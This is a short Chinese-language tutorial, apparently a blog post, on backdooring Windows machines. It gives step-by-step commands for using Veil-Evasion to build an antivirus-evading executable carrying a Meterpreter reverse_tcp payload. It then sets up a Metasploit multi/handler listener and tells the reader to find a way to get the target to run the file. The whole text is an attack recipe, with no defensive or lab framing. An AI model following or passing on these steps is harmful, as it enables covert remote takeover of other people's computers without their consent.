Metasploit使用后门程序渗透Windows

终端中运行  veil-evasion

输入list查看可用模块 

这里使用    7)      c/shellcode_inject/flatc

输入 use 7

generate

1 (default)

回车选择默认的 windows/meterpreter/reverse_tcp

tab 选择本地IP 也可以自己输入指定IP

端口 用默认的 4444

回车 回车

Generating shellcode...   等待

指定 文件名

/usr/share/veil-output/compiled/   在此位置找到所生成的exe文件  想方法使目标机运行

启动msf  (msfconsole)

加载exploit/multi/handler模块: use exploit/multi/handler

设定 payload: set payload windows/meterpreter/reverse_tcp

show options 查看所需设置的参数

set LHOST 你的IP (需与 veil操作中所指定的IP相同)

exploit  开始监听



设置本地主机;然后开始监听:exploit -z -j :


你可能感兴趣的:(kali,msf)